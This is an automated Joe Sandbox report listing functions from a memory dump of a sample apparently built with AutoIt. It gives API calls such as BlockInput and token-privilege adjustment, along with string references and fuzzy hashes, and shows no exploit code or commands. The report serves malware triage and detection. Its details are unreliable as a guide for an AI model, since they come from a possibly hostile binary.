Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 0fed602b98d59f63812ade818f6519c78ec6173b920f502531fc373c889a4f88
Instruction ID: 1459e3180b03a526963d0b69c6fa73476ff3f6a47ba8ddff2ba73d6fafda3fcd
Opcode Fuzzy Hash: 0fed602b98d59f63812ade818f6519c78ec6173b920f502531fc373c889a4f88
Instruction Fuzzy Hash: 98E04F32018710BEE7252B51FC09E7377A9EB04311B20892EF4A6804B1DB726CA0DB54

Function 001F676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001F6766,?,?,00000008,?,?,001FFEFE,00000000), ref: 001F6998

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 372d10f703f5832d124f60877ff4d04eb1837b0b813896ad111bdaa873b23c09
Instruction ID: b83be9a2548de0c36bebe5efdbd66812af8d9be4d037ceaf1217950a78812ede
Opcode Fuzzy Hash: 372d10f703f5832d124f60877ff4d04eb1837b0b813896ad111bdaa873b23c09
Instruction Fuzzy Hash: 45B14D31610609DFD719CF28C48AB657BE0FF45368F29865CEA99CF2A2C375E991CB40

Function 001DB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0021851F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: fab62323a914eea30012b0dbfe95b4ec010069201a07e19f2c4f288f5946e8d2
Instruction ID: 136064460bd1c343056588effb2ccb282f91234140a1050cfbfc7cecfa7eb465
Opcode Fuzzy Hash: fab62323a914eea30012b0dbfe95b4ec010069201a07e19f2c4f288f5946e8d2
Instruction Fuzzy Hash: C7125E71914229DBCB14CF58C881AEEB7F5FF58710F15819AE84AEB251EB309E91CF90

Function 0023EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0023EABD

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 00231e24086372285afc5e09700279a7c11559ffee7075b80b483e5701728aef
Instruction ID: 1d176680d09e68787947c32ed41658ea59fb8c14a24289c58954f7ec3971ec6a
Opcode Fuzzy Hash: 00231e24086372285afc5e09700279a7c11559ffee7075b80b483e5701728aef
Instruction Fuzzy Hash: 9FE04F712102059FC710EF59E845E9AF7EDAFA8760F01841AFC49C7391DBB0EC458B90

Function 001E09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001E03EE), ref: 001E09DA

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1682d498431d42e15fcd44d31c323096915076d156199cb2e38cfb2a111b2126
Instruction ID: f2d8f5cade76abe49a4a40dc800ea9e8c36f09495a3e2a7825a0dcf23925d83d
Opcode Fuzzy Hash: 1682d498431d42e15fcd44d31c323096915076d156199cb2e38cfb2a111b2126
Instruction Fuzzy Hash:

Function 001E781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 001E798B

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 4e909ecabfc189c050416c4e24ff40cea0d51028d769430d5c257ad4b794abf4
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 1251537160CFC55AFB38856B885AFBEA3899F72354F180919E886C72C3CB15DE41D352

Function 00232046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&), xrefs: 00232053

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID: 0&)
API String ID: 0-1514547146
Opcode ID: e4546ce68b647872cb063fe481ccd53bea59890b762ec103f6fded22a930bf24
Instruction ID: 13693c7603fb37c2fa8638226592736626702178b9ec9e0938927db238f0dd0f
Opcode Fuzzy Hash: e4546ce68b647872cb063fe481ccd53bea59890b762ec103f6fded22a930bf24
Instruction Fuzzy Hash: F221A572621615CBDB2CCE79D82267E73E9A764310F15862EE4A7C77D0DE35A908CB80

Function 001F6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08df3326bb580976d5351816961e6d97fd93f092ecc2c1a2c644a3b177dbeac1
Instruction ID: 0ef7845f3ccc10fa6784d7bbe6f71c42e34e3cb31ab25901f61ffe203bc7f2fb
Opcode Fuzzy Hash: 08df3326bb580976d5351816961e6d97fd93f092ecc2c1a2c644a3b177dbeac1
Instruction Fuzzy Hash: 6C324522D29F058DD7239634EC26335A289AFB73C5F15D737F81AB59AAEB69C4834100

Function 001DCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d64b4329b37b360f1961f9d2510ea67e639423ad8715a625ffd8e7325eed5086
Instruction ID: 1b1a0133d19478de2a6a0413668ccbf7de939f514b0507fd80a5fef2da513d44
Opcode Fuzzy Hash: d64b4329b37b360f1961f9d2510ea67e639423ad8715a625ffd8e7325eed5086
Instruction Fuzzy Hash: 7D320139AA41568BCF28CE28C4946FDB7E1AF55314F38856BD54A8B291D330DDE1DB80

Function 001C7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bddb51ef4279e3a994a2c9626c932b62d2145098846f4a6734796defd4161df9
Instruction ID: b50a3c51691874a2b5dfcfa777708623cbca7366d52a1471a9aed0a7cb1cc820
Opcode Fuzzy Hash: bddb51ef4279e3a994a2c9626c932b62d2145098846f4a6734796defd4161df9
Instruction Fuzzy Hash: AD22AE70A0061A9FDF14CFA4D881BAEB7B5FF68300F144529E816A7291EB76DE51CF50

Function 001C91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71209b0e26090d45e192e861f724d2a922a5edc863bfb4c32e5387a4441ff1b8
Instruction ID: e24f0c92d0778868042e79c557b2e551f4b56faa26667737dc0c5905bfa52370
Opcode Fuzzy Hash: 71209b0e26090d45e192e861f724d2a922a5edc863bfb4c32e5387a4441ff1b8
Instruction Fuzzy Hash: 1A02C6B0A10206EBDF04DF64D881BADB7B5FF54300F118569E8169B2D1EB71EA61CB91

Function 001E1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 931509616d8bf165d99cd0e9c1a0e9f3c528b4b95f6854edd335ae059bbae0f9
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 1D9164736084E35ADB2E467B857847EFFE16A923A131A079DE4F2CB1C1EF348954D620

Function 001E19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 1493d4155a53294820b28132b5db5015db359a1a59c3f5654349fadbec20a757
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 93911F722098E35ADB2D467B857407EFEF15A923A231A07AED4F2CB1C1FF348554D620

Function 001E7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab4c74c095737144c1e96050abed50a8a92352ce482af680aae116f619f9c238
Instruction ID: 1edfbe7df4942cb11ebe2e8bcfcc9249b7a12324317b5ecd2eeb9069358ce53a
Opcode Fuzzy Hash: ab4c74c095737144c1e96050abed50a8a92352ce482af680aae116f619f9c238
Instruction Fuzzy Hash: B6616B71608FCA96FA38A92B9C95BBE7398DF91700F28092DE843DB2C1D7119E428315

Function 001E7CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff6ee6f5bb2b81569163fceee9170094af7641033ecafbd8ff7eae16d5b7db9
Instruction ID: f858ae5698d6b432db3aebf1cece98875831e8fc2289f2338295ac5748205591
Opcode Fuzzy Hash: dff6ee6f5bb2b81569163fceee9170094af7641033ecafbd8ff7eae16d5b7db9
Instruction Fuzzy Hash: 06618971208FC966FE3D9AAB5C95BBF6389FF52740F100959E942CB2C1EB129D428315

Function 001E1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 407dc875b9638820fa378fadc89c1d2916af9e9d8084f2ed9277171482bd2c61
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 758172736088E35ADB2D423B857447EFFE15A927A531A079ED4F2CA1C2EF348554E620

Function 00242ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00242B30
DeleteObject.GDI32(00000000), ref: 00242B43
DestroyWindow.USER32 ref: 00242B52
GetDesktopWindow.USER32 ref: 00242B6D
GetWindowRect.USER32(00000000), ref: 00242B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00242CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00242CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242CF8
GetClientRect.USER32(00000000,?), ref: 00242D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00242D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242D80
GlobalLock.KERNEL32(00000000), ref: 00242D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242D98
GlobalUnlock.KERNEL32(00000000), ref: 00242DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242DA8
GlobalFree.KERNEL32(00000000), ref: 00242DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0025FC38,00000000), ref: 00242DDB
GlobalFree.KERNEL32(00000000), ref: 00242DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00242E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00242E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024303F

Strings

static, xrefs: 00242D3A, 00242E91
AutoIt v3, xrefs: 00242CF2
DISPLAY, xrefs: 00242EA2
, xrefs: 00242FC5

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 661b68695557b4ce0817e0e75632f028f758adb163bf568c85ca4973efaed74c
Instruction ID: b71ec36e83b85bbab2f5a2c931cb4fe5d5f1c3a2162b05fea9028374a0798e60
Opcode Fuzzy Hash: 661b68695557b4ce0817e0e75632f028f758adb163bf568c85ca4973efaed74c
Instruction Fuzzy Hash: 25029971910205EFDB18DFA5EC89EAE7BB9EB48311F108158F915AB2A1DB70ED04CF64

Function 002570D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0025712F
GetSysColorBrush.USER32(0000000F), ref: 00257160
GetSysColor.USER32(0000000F), ref: 0025716C
SetBkColor.GDI32(?,000000FF), ref: 00257186
SelectObject.GDI32(?,?), ref: 00257195
InflateRect.USER32(?,000000FF,000000FF), ref: 002571C0
GetSysColor.USER32(00000010), ref: 002571C8
CreateSolidBrush.GDI32(00000000), ref: 002571CF
FrameRect.USER32(?,?,00000000), ref: 002571DE
DeleteObject.GDI32(00000000), ref: 002571E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00257230
FillRect.USER32(?,?,?), ref: 00257262
GetWindowLongW.USER32(?,000000F0), ref: 00257284

Part of subcall function 002573E8: GetSysColor.USER32(00000012), ref: 00257421
Part of subcall function 002573E8: SetTextColor.GDI32(?,?), ref: 00257425
Part of subcall function 002573E8: GetSysColorBrush.USER32(0000000F), ref: 0025743B
Part of subcall function 002573E8: GetSysColor.USER32(0000000F), ref: 00257446
Part of subcall function 002573E8: GetSysColor.USER32(00000011), ref: 00257463
Part of subcall function 002573E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00257471
Part of subcall function 002573E8: SelectObject.GDI32(?,00000000), ref: 00257482
Part of subcall function 002573E8: SetBkColor.GDI32(?,00000000), ref: 0025748B
Part of subcall function 002573E8: SelectObject.GDI32(?,?), ref: 00257498
Part of subcall function 002573E8: InflateRect.USER32(?,000000FF,000000FF), ref: 002574B7
Part of subcall function 002573E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002574CE
Part of subcall function 002573E8: GetWindowLongW.USER32(00000000,000000F0), ref: 002574DB

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: a2d8a9d13ac1cd051d7b916d7a069f39650e8e3836c41ae29a3492c8aefe6335
Instruction ID: c6a18773671c56ba208e8085df916756ef74a72970f8e432188af47dda629cf8
Opcode Fuzzy Hash: a2d8a9d13ac1cd051d7b916d7a069f39650e8e3836c41ae29a3492c8aefe6335
Instruction Fuzzy Hash: B6A1A172018702BFDB009F60EC4CA5B7BA9FB49322F204A19F966A61E1E770E954CB55

Function 001D8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 001D8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00216AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00216AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00216F43

Part of subcall function 001D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001D8BE8,?,00000000,?,?,?,?,001D8BBA,00000000,?), ref: 001D8FC5

SendMessageW.USER32(?,00001053), ref: 00216F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00216F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00216FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00216FB7

Strings

0, xrefs: 00216DCF

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: d0a39c87a4a71e57ee4420c16f2a4e4966e3a3170123bd39f10bcfcbfb6d82e6
Instruction ID: 13e56f7db5fc92f925d68e39a4f290eea1ae8af48cdf7d18698a2cc9b25eb33d
